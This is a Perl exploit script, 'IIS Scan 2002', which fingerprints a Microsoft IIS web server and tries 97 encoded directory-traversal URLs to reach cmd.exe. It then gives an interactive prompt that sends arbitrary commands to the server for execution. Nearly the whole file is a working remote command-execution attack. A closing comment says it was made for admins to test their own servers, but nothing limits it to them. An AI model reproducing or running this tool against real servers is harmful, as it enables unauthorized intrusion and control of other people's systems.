IIS Scanner 2002.pl

#!/usr/bin/perl -w
#
# IIS Scan 2002 By Thomas O'Connor edited version of Unicode Shell By B-Root.
# IIS unicode strings to exploit IIS web servers.
# First tries to get IIS Server string. 
# Scans for usable Unicode URL in many different ways.
# Then allows choice of which URL to use including an URL of
# your own design eg. After copying cmd.exe to /scripts.
# Commands are executed via your choice of URL on the target
# server.
# URL can be changed at anytime by typing URL. 
# The Webserver can be re-SCANed at anytime by typing SCAN.
# Program can be QUIT at anytime by typing QUIT.
# HELP shows this.
# Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ).


use strict;
use IO::Socket;

# Globals Go Here.
my $host;		# Host being probed.
my $port;		# Webserver port.
my $command;		# Command to issue.
my $url;		# URL being used.
my @results;		# Results from server.
my $probe;		# Whether to display output.
my @U;			# Unicode URLS. 

# URLS - Feel free to add here I did ;) tom.
# $U[0] always used for custom URL.
$U[1] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[2] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[3] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[4] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[5] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[6] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[7] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[8] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[9] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[10] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[11] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[12] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[13] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[14] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+";
$U[15] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[16] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[17] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[18] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[20] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[21] = "/MSADC/root.exe?/c+dir";
$U[22] = "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[23] = "/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[24] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[25] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[26] = "/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[27] = "/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[28] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[29] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[30] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[31] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[32] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[33] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[34] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir";
$U[35] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[36] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[37] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[38] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[39] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[40] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[41] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[42] = "/c/winnt/system32/cmd.exe?/c+dir";
$U[43] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[44] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[45] = "/d/winnt/system32/cmd.exe?/c+dir";
$U[46] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
$U[47] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[48] = "/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[49] = "/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[50] = "/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[51] = "/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[52] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[53] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[54] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[55] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[56] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[57] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[58] = "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir";
$U[59] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[60] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir";
$U[61] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[62] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[63] = "/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[64] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[65] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[66] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[67] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[68] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[69] = "/msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir";
$U[70] = "/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[71] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[72] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir";
$U[73] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir";
$U[74] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[75] = "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[76] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[77] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
$U[78] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir";
$U[79] = "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir";
$U[80] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[81] = "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir";
$U[82] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir";
$U[83] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir";
$U[84] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir";
$U[85] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir";
$U[86] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[87] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir";
$U[88] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir";
$U[89] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir";
$U[90] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir";
$U[91] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir";
$U[92] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[93] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[94] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[95] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[96] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[97] = "/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";

# SUBROUTINES GO HERE. 
&intro;
&scan;
&choose;
&command;
&exit; # Play safe with this .

sub intro {
&help;
&host;
&server;
sleep 3;
};

# host subroutine.
sub host {
print "\nHost : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="localhost"};
print "\nPort : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	# end host subroutine.

# Server string subroutine.
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nChecking if the server is IIS ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/IIS/){ $webserver = "iis" };
	};
};
if ($webserver ne "iis"){
print "\a\a\n\nWARNING : I DONT THINK THE SERVER IS IIS.";		
print "\nThis Server may not be running Micro\$oft IIS WebServer";
print "\nand therefore may not be exploitable using the"; 
print "\nUnicode Bug.";
print "\n\n\nDo You Wish To Cont ... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK ... It Seems To Be IIS.";
	};		
};  # end server subroutine.

# scan subroutine.
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nScanning Webserver $host on port $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};

if ($flag eq "0") { 
print "\n$host is not vulnerable to Unicode URL Number $loop.";
}else{
print "\a\a\a\n$host IS VULNERABLE TO UNICODE URL NUMBER $loop !!!";
     };
};
if ($status eq "not_vulnerable"){
				print "\n\nSORRY $host is NOT Vulnerable to the UNICODE Exploit.";
				&exit;
				};
}; # end scan subroutine.

# choose URL subroutine.
sub choose {
print "\nURL To Use [0 = Other]: ";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "\nURL: HTTP://$host$url"; 
}; # end choose URL subroutine.

# Other URL subroutine.
sub other {
print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+"; 
print "\nHTTP://$host";
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  # end other subroutine.

# Command subroutine.
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\nCommand :";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; # remove white space.
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  # end command subroutine.

# Connect subroutine.
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  # end connect subroutine.

# output subroutine.
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
# if probe is a for server string display only first 10 lines.
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
# else print all server output to the screen.
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  # end output subroutine.

# exit subroutine.
sub exit{
print "\n\n\nYou should be happy i made this for testing so your server is secure#.";
print "\nCya!";
print "\n\n\n";
exit;
};

# Help subroutine.
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n IIS Scan 2002 by Thomas O'Connor.";
print "\n www.thomasoconnor.net";
print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\n A Unicode HTTP exploit for IIS WebServers.";
print "\n";
print "\n First checks if the server is IIS.";
print "\n Scans for usable Unicode URL in 97 different ways.";
print "\n Then allows choice of which URL to use including an URL of";
print "\n your own design eg. After copying cmd.exe to /scripts.";
print "\n Commands are executed via your choice of URL on the target";
print "\n server.";
print "\n ";
print "\n URL can be changed at anytime by typing URL."; 
print "\n The Webserver can be re-SCANed at anytime by typing SCAN.";
print "\n Program can be QUIT at anytime by typing QUIT.";
print "\n HELP prints this ... ";
print "\n Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ). !";
print "\n\n\n";
}; # end help subroutine.


# Thomas O'Connors first public production #theboxnetwork irc.dal.net .
# I piced this together for admins to test their own IIS servers with a mass number of iis strings.
# IIS Scan 2002 edited version of Unicode Shell by Thomas O'Connor [[Vline of Dalnet] http://www.thomasoconnor.tk webmaster@mail.ie #theboxnetwork irc.dal.net.
# Once again Thanks to B-Root for his code I really just updated the iis strings.